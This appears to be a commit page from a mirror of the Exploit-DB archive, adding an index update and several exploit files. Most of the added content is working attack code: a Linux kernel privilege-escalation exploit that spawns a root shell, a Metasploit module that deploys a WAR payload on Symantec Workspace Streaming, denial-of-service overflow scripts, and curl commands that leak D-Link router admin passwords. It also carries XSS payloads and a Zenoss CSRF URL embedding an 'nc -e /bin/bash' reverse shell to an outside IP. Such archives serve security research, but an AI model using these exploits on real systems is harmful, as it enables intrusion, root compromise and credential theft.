bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 05_28_2014

Browse source
This commit is contained in:
Offensive Security 2014-05-28 04:36:16 +00:00
parent 1a66c6956f
commit 9629404d0d
18 changed files with 1025 additions and 37 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -1753,7 +1753,7 @@ id,file,description,date,author,platform,type,port
2052,platforms/windows/remote/2052.sh,"MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
2054,platforms/windows/remote/2054.txt,"MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
2056,platforms/windows/local/2056.c,"Microsoft IIS ASP Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
2057,platforms/windows/dos/2057.c,"MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
@ -30174,7 +30174,6 @@ id,file,description,date,author,platform,type,port
33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0
33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33492,platforms/php/webapps/33492.txt,"kesako script SQL Injection",2014-05-24,Microsoft-dz,php,webapps,0
33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0
33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0
@ -30191,3 +30190,19 @@ id,file,description,date,author,platform,type,port
33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855
33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0
33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 'id' Parameter Cross Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0
33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 'ibmdiradm' Null Pointer Dereference Denial of Service Vulnerability",2006-04-01,Intevydis,unix,dos,0
33528,platforms/php/webapps/33528.txt,"Xforum 1.4 'nbpageliste' Parameter Cross Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0
33529,platforms/php/webapps/33529.txt,"Joomla! 'com_marketplace' Component 1.2 'catid' Parameter Cross-Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0
33530,platforms/php/webapps/33530.txt,"LetoDMS 1.4.x 'lang' Parameter Local File Include Vulnerability",2010-01-15,"D. Fabian",php,webapps,0
33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability",2010-01-15,Intevydis,multiple,dos,0
33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 'oidldapd' Remote Memory Corruption Vulnerability",2006-11-10,Intevydis,multiple,dos,0
33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0
33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0

Can't render this file because it is too large.

105
platforms/hardware/webapps/33520.txt Executable file
View file

@ -0,0 +1,105 @@
The following five D-Link model routers suffer from several
vulnerabilities including Clear Text Storage of Passwords, Cross Site
Scripting and Sensitive Information Disclosure.
DIR-652
D-Link Wireless N Gigabit Home Router
DIR-835
D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router
DIR-855L -
D-Link Wireless N900 Dual Band Gigabit Router
DGL-5500
D-Link AC1300 Gaming Router
DHP-1565
D-Link Wireless N PowerLine Gigabit Router
Affected firmware - FW 1.02b18/1.12b02 or older
Access - Remote
Complexity - Low
Authentication - None
Impact - Full loss of confidentiality
-------------------------------------------------------------------------------------------------------------
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
Authentication can be bypassed to gain access to the file
tools_admin.asp, which stores the devices admin password in plain
text, by adding a "/" to the end of the URL.
Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:
curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.
curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&
/admin_password_tmp/ && /value/ {print $5}'
-------------------------------------------------------------------------------------------------------------
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User
Input / Return
For the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POST
param "action" suffers from a XSS vulnerability due to improper
neutralization of user input / return output.
PoC for DIR-855L, DIR-835, DHP-1565
http://<IP>/apply.cgi
POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1
For the DGL-5500
http://<IP>/apply_sec.cgi
POST
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
HTTP/1.1
-------------------------------------------------------------------------------------------------------------
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a
vulnerability which an unauthenticated person can gain access the
sensitive files:
http://<IP>:8080/hnap.cgi and /HNAP1/ via:
curl -s curl -s http://<IP>:8080/HNAP1/
On the DIR-652 and DHP-1565, a user needs authentication first to
gain access to these files.
But more importantly, an unauthenticated user can browse directly to
http://<IP>/cgi/ssi/ which will offer a download of the device's ELF
MBS MIPS file. The file contains most of the devices internal working
structure and sensitive information. These particular routers use a
MSB EM_MIPS Processor and it does contain executable components.
The file can be accessed through at least one known cgi file, however
there maybe others. Although no known publicly working example exist
to my knowledge, unpatched devices are susceptible to injection of
malicious code and most likely susceptible to a payload which could
deploy a self-replicating worm.
-------------------------------------------------------------------------------------------------------------
These items were reported to D-Link on April 20th, and to US Cert on
April 21. D-Link does have patches available for all affected models,
and it is highly recommended to update the device's firmware as soon
as possible.
Vendor Links:
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025
http://securityadvisories.dlink.com/security/
Research Contact - Kyle Lovett
May 21, 2014

220
platforms/linux/local/33516.txt Executable file
View file

@ -0,0 +1,220 @@
/*
* CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
* condition
*
* Slightly-less-than-POC privilege escalation exploit
* For kernels >= v3.14-rc1
*
* Matthew Daley <mattd@bugfuzz.com>
*
* Usage:
* $ gcc cve-2014-0196-md.c -lutil -lpthread
* $ ./a.out
* [+] Resolving symbols
* [+] Resolved commit_creds: 0xffffffff81056694
* [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
* [+] Doing once-off allocations
* [+] Attempting to overflow into a tty_struct...............
* [+] Got it :)
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* WARNING: The overflow placement is still less-than-ideal; there is a 1/4
* chance that the overflow will go off the end of a slab. This does not
* necessarily lead to an immediate kernel crash, but you should be prepared
* for the worst (i.e. kernel oopsing in a bad state). In theory this would be
* avoidable by reading /proc/slabinfo on systems where it is still available
* to unprivileged users.
*
* Caveat: The vulnerability should be exploitable all the way from
* v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
* commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
* GFP_ATOMIC memory consumption") that make exploitation simpler, which this
* exploit relies on.
*
* Thanks to Jon Oberheide for his help on exploitation technique.
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>
#define TTY_MAGIC 0x5401
#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS 30
struct device;
struct tty_driver;
struct tty_operations;
typedef struct {
int counter;
} atomic_t;
struct kref {
atomic_t refcount;
};
struct tty_struct_header {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
} overwrite;
typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);
int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;
int payload(void) {
commit_creds(prepare_kernel_cred(0));
return 0;
}
unsigned long get_symbol(char *target_name) {
FILE *f;
unsigned long addr;
char dummy;
char name[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL)
return 0;
while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
if (ret == 0) {
fscanf(f, "%s\n", name);
continue;
}
if (!strcmp(name, target_name)) {
printf("[+] Resolved %s: %p\n", target_name, (void *)addr);
fclose(f);
return addr;
}
}
printf("[-] Couldn't resolve \"%s\"\n", name);
fclose(f);
return 0;
}
void *overwrite_thread_fn(void *p) {
write(slave_fd, buf, 511);
write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
write(slave_fd, &overwrite, sizeof(overwrite));
}
int main() {
char scratch[1024] = {0};
void *tty_operations[64];
int i, temp_fd_1, temp_fd_2;
for (i = 0; i < 64; ++i)
tty_operations[i] = payload;
overwrite.magic = TTY_MAGIC;
overwrite.kref.refcount.counter = 0x1337;
overwrite.dev = (struct device *)scratch;
overwrite.driver = (struct tty_driver *)scratch;
overwrite.ops = (struct tty_operations *)tty_operations;
puts("[+] Resolving symbols");
commit_creds = (commit_creds_fn)get_symbol("commit_creds");
prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
if (!commit_creds || !prepare_kernel_cred)
return 1;
puts("[+] Doing once-off allocations");
for (i = 0; i < ONEOFF_ALLOCS; ++i)
if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
puts("[-] pty creation failed");
return 1;
}
printf("[+] Attempting to overflow into a tty_struct...");
fflush(stdout);
for (i = 0; ; ++i) {
struct termios t;
int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
pthread_t overwrite_thread;
if (!(i & 0xfff)) {
putchar('.');
fflush(stdout);
}
if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
}
for (j = 0; j < RUN_ALLOCS; ++j)
if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
puts("\n[-] pty creation failed");
return 1;
}
close(fds[RUN_ALLOCS / 2]);
close(fds2[RUN_ALLOCS / 2]);
write(slave_fd, buf, 1);
tcgetattr(master_fd, &t);
t.c_oflag &= ~OPOST;
t.c_lflag |= ECHO;
tcsetattr(master_fd, TCSANOW, &t);
if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
puts("\n[-] Overwrite thread creation failed");
return 1;
}
write(master_fd, "A", 1);
pthread_join(overwrite_thread, NULL);
for (j = 0; j < RUN_ALLOCS; ++j) {
if (j == RUN_ALLOCS / 2)
continue;
ioctl(fds[j], 0xdeadbeef);
ioctl(fds2[j], 0xdeadbeef);
close(fds[j]);
close(fds2[j]);
}
ioctl(master_fd, 0xdeadbeef);
ioctl(slave_fd, 0xdeadbeef);
close(master_fd);
close(slave_fd);
if (!setresuid(0, 0, 0)) {
setresgid(0, 0, 0);
puts("\n[+] Got it :)");
execl("/bin/bash", "/bin/bash", NULL);
}
}
}

57
platforms/linux/local/33523.c Executable file
View file

@ -0,0 +1,57 @@
source: http://www.securityfocus.com/bid/37806/info
Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges.
Successful exploits will result in the complete compromise of affected computers.
The Linux Kernel 2.6.28 and later are vulnerable.
#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
#include <asm/ioctls.h>
// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
int fd;
pid_t child;
unsigned flag = ~0;
fd = open("/dev/urandom", O_RDONLY);
// set up exclusive lock, but dont block
flock(fd, LOCK_EX | LOCK_NB);
// set ASYNC flag on descriptor
ioctl(fd, FIOASYNC, &flag);
// close the file descriptor to trigger the bug
close(fd);
// now exec some stuff to populate the AT_RANDOM entries, which will cause
// the released file to be used.
// This assumes /bin/true is an elf executable, and that this kernel
// supports AT_RANDOM.
do switch (child = fork()) {
case 0: execl("/bin/true", "/bin/true", NULL);
abort();
case -1: fprintf(stderr, "fork() failed, %m\n");
break;
default: fprintf(stderr, ".");
break;
} while (waitpid(child, NULL, 0) != -1);
fprintf(stderr, "waitpid() failed, %m\n");
return 1;
}

15
platforms/linux/remote/33535.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37842/info
SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
Versions prior to SystemTap 1.1 are vulnerable.
The following example commands are available:
stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '

52
platforms/multiple/dos/33531.py Executable file
View file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/37829/info
Zeus Web Server is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Zeus Web Server 4.3r5 are vulnerable.
#!/usr/bin/env python
# zeus_ssl2.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import sys
import struct
def send_req(host,port):
buf=""
buf+=chr(1)
buf+="\x00\x02"
buf+=struct.pack(">H",21)
buf+=struct.pack(">H",0xffff)
buf+=struct.pack(">H",16)
buf+="\x07\x00\xc0\x03\x00\x80\x01\x00\x80\x08\x00\x80"
buf+="\x06\x00\x40\x04\x00\x80\x02\x00\x80"
buf+="A"* 50000
buf+="C"*16
siz = chr( ( (len(buf) & 0xff00) >> 8)| 0x80) + chr(len(buf)&0xff)
buf = siz + buf
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(buf)
sock.recv(1000)
sock.close()
if __name__=="__main__":
if len(sys.argv)<3:
print "usage: %s host port" % sys.argv[0]
sys.exit()
send_req(sys.argv[1],int(sys.argv[2]))

16
platforms/multiple/dos/33532.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/37833/info
Oracle Internet Directory is prone to a remote memory-corruption vulnerability.
Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.
Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.
NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.
s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"

356
platforms/multiple/remote/33521.rb Executable file
View file

@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-1649'],
['BID', '67189'],
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 12 2014'))
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
], self.class)
end
def send_xml_rpc_request(xml)
res = send_request_cgi(
{
'uri' => normalize_uri("/", "xmlrpc"),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => xml
})
res
end
def build_soap_get_file(file_path)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.getFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file_name = params.add_element("param")
value_file_name = param_file_name.add_element("value")
value_file_name.text = file_path
param_file_binary = params.add_element("param")
value_file_binary = param_file_binary.add_element("value")
type_file_binary = value_file_binary.add_element("boolean")
type_file_binary.text = "0"
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_put_file(file)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file = params.add_element("param")
value_file = param_file.add_element("value")
type_value_file = value_file.add_element("ex:serializable")
type_value_file.text = file
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_check_put
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
xml.root.add_element("params")
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def parse_method_response(xml)
doc = Document.new(xml)
file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
unless file.nil?
file = Rex::Text.decode_base64(file.text)
end
file
end
def get_file(path)
xml_call = build_soap_get_file(path)
file = nil
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
file = parse_method_response(res.body.to_s)
end
file
end
def put_file(file)
result = nil
xml_call = build_soap_put_file(file)
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
result = parse_method_response(res.body.to_s)
end
result
end
def upload_war(war_name, war, dst)
result = false
java_file = build_java_file_info("#{dst}#{war_name}", war)
java_file = Rex::Text.encode_base64(java_file)
res = put_file(java_file)
if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
result = true
end
result
end
def jboss_deploy_path
path = nil
leak = get_file("bin/CreateDatabaseSchema.cmd")
if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
path = $1
end
path
end
def check
check_result = Exploit::CheckCode::Safe
if jboss_deploy_path.nil?
xml = build_soap_check_put
res = send_xml_rpc_request(xml)
if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
check_result = Exploit::CheckCode::Detected
end
else
check_result = Exploit::CheckCode::Appears
end
check_result
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
end
print_status("#{peer} - Building WAR payload...")
app_name = Rex::Text.rand_text_alpha(4 + rand(4))
war_name = "#{app_name}.war"
war = payload.encoded_war({ :app_name => app_name }).to_s
deploy_dir = "..#{jboss_path}"
print_status("#{peer} - Uploading WAR payload...")
res = upload_war(war_name, war, deploy_dir)
unless res
fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
end
register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET',
'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def ste_port
datastore['STE_PORT']
end
# com.appstream.cm.general.FileInfo serialized object
def build_java_file_info(file_name, contents)
stream = "\xac\xed" # stream magic
stream << "\x00\x05" # stream version
stream << "\x73" # new Object
stream << "\x72" # TC_CLASSDESC
stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
stream << "com.appstream.cm.general.FileInfo"
stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [6].pack("n") # number of fields in the class
stream << "Z" # boolean
stream << ["bLastPage".length].pack("n")
stream << "bLastPage"
stream << "J" # long
stream << ["lFileSize".length].pack("n")
stream << "lFileSize"
stream << "[" # array
stream << ["baContent".length].pack("n")
stream << "baContent"
stream << "\x74" # TC_STRING
stream << ["[B".length].pack("n")
stream << "[B" # field's type (byte array)
stream << "L" # Object
stream << ["dTimeStamp".length].pack("n")
stream << "dTimeStamp"
stream << "\x74" # TC_STRING
stream << ["Ljava/util/Date;".length].pack("n")
stream << "Ljava/util/Date;" #field's type (Date)
stream << "L" # Object
stream << ["sContent".length].pack("n")
stream << "sContent"
stream << "\x74" # TC_STRING
stream << ["Ljava/lang/String;".length].pack("n")
stream << "Ljava/lang/String;" #field's type (String)
stream << "L" # Object
stream << ["sFileName".length].pack("n")
stream << "sFileName"
stream << "\x71" # TC_REFERENCE
stream << [0x007e0003].pack("N") # handle
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
# Values
stream << [1].pack("c") # bLastPage
stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
stream << "\x75" # TC_ARRAY
stream << "\x72" # TC_CLASSDESC
stream << ["[B".length].pack("n")
stream << "[B" # byte array)
stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [0].pack("n") # number of fields in the class
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
stream << [contents.length].pack("N")
stream << contents # baContent
stream << "\x70" # TC_NULL # dTimeStamp
stream << "\x70" # TC_NULL # sContent
stream << "\x74" # TC_STRING
stream << [file_name.length].pack("n")
stream << file_name # sFileName
stream
end
end

14
platforms/multiple/remote/33536.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/37843/info
Zenoss is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, execute arbitrary commands, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Zenoss 2.3.3 is vulnerable; prior versions are also vulnerable.
http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping

17
platforms/php/remote/33525.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/37809/info
Zend Framework is prone to multiple input-validation vulnerabilities and a weakness:
- Multiple cross-site scripting issues
- An HTML-injection issue
- A security-bypass weakness
